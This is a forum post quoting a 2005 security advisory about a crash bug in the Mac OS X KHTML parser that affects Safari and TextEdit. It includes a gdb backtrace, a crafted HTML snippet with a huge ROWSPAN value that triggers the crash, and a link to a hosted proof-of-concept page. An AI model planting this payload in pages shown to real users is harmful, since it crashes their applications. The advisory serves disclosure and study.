Mac OS X <= 10.4.3 KHTMLParser Denial of Service

[thrunner]

This url will crash Safari, but not IE or Firefox:

http://www.security-protocols.com/poc/sp-x22.html

 

As OSX becomes more popular, there will be more exploits. Keep this url handy for further developments:

http://www.security-protocols.com/

 

Mac OS X <= 10.4.3 KHTMLParser DoS

 

Release Date:

December 21, 2005

 

Severity:

Medium

 

Vendor:

Apple

 

Versions Affected:

Mac OS X 10.4.3 and prior

Safari 2.0.2 (416.13) and prior

TextEdit 1.4 (220) and prior

 

Overview:

A denial of service vulnerability exists within the KHTMLParser on

Apple OS X 10.4.3 and all prior versions which allows for an attacker to cause

the application which uses this class to crash the application.

 

Technical Details:

When running a specially crafted .html file, the

khtml::RenderTableSection::ensureRows inproperly parsers the data and causes

the crash. The KTHML parser attempts to resize an internal array to the

number of elements indicated by the rowspan value. If the value is very large,

it is not possible to resize the array and the application quits. On a

default install of Apple OS X, Safari and TextEdit are vulnerable.

 

Below the crash is triggered using Safari on OS X 10.4.3 within gdb:

 

Program received signal SIGABRT, Aborted.

0x9004716c in kill ()

(gdb) bt

#0 0x9004716c in kill ()

#1 0x90128b98 in abort ()

#2 0x95dcd974 in khtml::sYSMALLOc () <(=-- Is called because of sYSMALLOc(1234567890)

#3 0x95dce1a4 in khtml::main_thread_realloc ()

#4 0x95bc0d64 in KWQArrayImpl::resize ()

#5 0x95c05428 in khtml::RenderTableSection::ensureRows ()

#6 0x95c0784c in khtml::RenderTableSection::addCell ()

#7 0x95c076ac in khtml::RenderTableRow::addChild ()

#8 0x95bcb2d8 in DOM::NodeImpl::createRendererIfNeeded ()

#9 0x95bcb1c4 in DOM::ElementImpl::attach ()

#10 0x95bca254 in KHTMLParser::insertNode ()

#11 0x95bcadd8 in KHTMLParser::insertNode ()

#12 0x95bcadd8 in KHTMLParser::insertNode ()

#13 0x95bc83fc in KHTMLParser::parseToken ()

#14 0x95bc54a4 in khtml::HTMLTokenizer::processToken ()

#15 0x95bc6e08 in khtml::HTMLTokenizer::parseTag ()

#16 0x95bc4d24 in khtml::HTMLTokenizer::write ()

#17 0x95bc038c in KHTMLPart::write ()

#18 0x959b510c in -[WebDataSource(WebPrivate) _commitLoadWithData:] ()

#19 0x9598165c in -[WebMainResourceClient addData:] ()

#20 0x95981588 in -[WebBaseResourceHandleDelegate didReceiveData:lengthReceived:] ()

#21 0x959db930 in -[WebMainResourceClient didReceiveData:lengthReceived:] ()

#22 0x95981524 in -[WebBaseResourceHandleDelegate connection:didReceiveData:lengthReceived:] ()

#23 0x92910a64 in -[NSURLConnection(NSURLConnectionInternal) _sendDidReceiveDataCallback] ()

#24 0x9290ef04 in -[NSURLConnection(NSURLConnectionInternal) _sendCallbacks] ()

#25 0x9290eca0 in _sendCallbacks ()

#26 0x9075db20 in __CFRunLoopDoSources0 ()

#27 0x9075cf98 in __CFRunLoopRun ()

#28 0x9075ca18 in CFRunLoopRunSpecific ()

#29 0x931861e0 in RunCurrentEventLoopInMode ()

#30 0x931857ec in ReceiveNextEventCommon ()

#31 0x931856e0 in BlockUntilNextEventMatchingListInMode ()

#32 0x93683904 in _DPSNextEvent ()

#33 0x936835c8 in -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] ()

#34 0x00007910 in ?? ()

#35 0x9367fb0c in -[NSApplication run] ()

#36 0x93770618 in NSApplicationMain ()

#37 0x0000307c in ?? ()

#38 0x00057758 in ?? ()

 

The following html code will trigger the crash. You can test this out using Safari, or TextEdit.

 

<TABLE WIDTH=" >

<" >

onLoad=() STYLE=

<SPAN= STYLE= >

<TD STYLE=^ ROWSPAN=1234567890 >

 

or hit the following url:

 

http://www.security-protocols.com/poc/sp-x22.html

 

Vendor Status:

Apple was notified.

 

Discovered by:

Tom Ferris

<tommy[at]security-protocols[dot]com>

 

Related Links:

http://www.security-protocols.com/advisory/sp-x22.txt

http://en.wikipedia.org/wiki/KHTML

http://www.laundromata.com

http://www.apple.com

 

Copyright © 2005 Security-Protocols.com